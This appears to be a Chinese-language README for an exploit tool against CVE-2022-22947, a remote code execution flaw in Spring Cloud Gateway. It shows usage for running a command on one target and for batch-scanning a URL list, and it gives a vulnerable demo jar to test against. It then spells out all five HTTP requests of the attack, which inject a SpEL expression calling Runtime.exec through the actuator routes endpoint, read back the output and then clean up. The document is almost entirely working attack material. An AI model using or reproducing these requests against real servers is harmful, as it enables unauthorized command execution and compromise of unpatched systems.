Awesome

Spring Cloud Gateway 远程代码执行漏洞

该漏洞对于线上业务风险较高，切勿进行未授权扫描

使用说明

╰─ ./CVE-2022-22947 -h                                                                                                                                                                                                                                            ─╯
执行命令：./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami 
批量检测：./CVE-2022-22947 -l url.txt 

启动漏洞环境

java -jar vuln/spring-gateway-demo-0.0.1-SNAPSHOT.jar 

漏洞分为5个请求

第一个请求(发送如下数据包即可添加一个包含恶意SpEL表达式的路由)

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 366

{
      "id": "hacktest",
      "filters": [{
        "name": "AddResponseHeader",
        "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
        }],
      "uri": "http://example.com",
      "order": 0
    }

第二个请求(刷新刚添加的路由)

POST /actuator/gateway/refresh HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

第三个请求(查看执行结果)

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

第四个请求(清理添加的路由)

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

第五个请求(刷新路由)

POST /actuator/gateway/refresh HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

致谢

JAR包 from 清水川崎 ; EXP from phith0n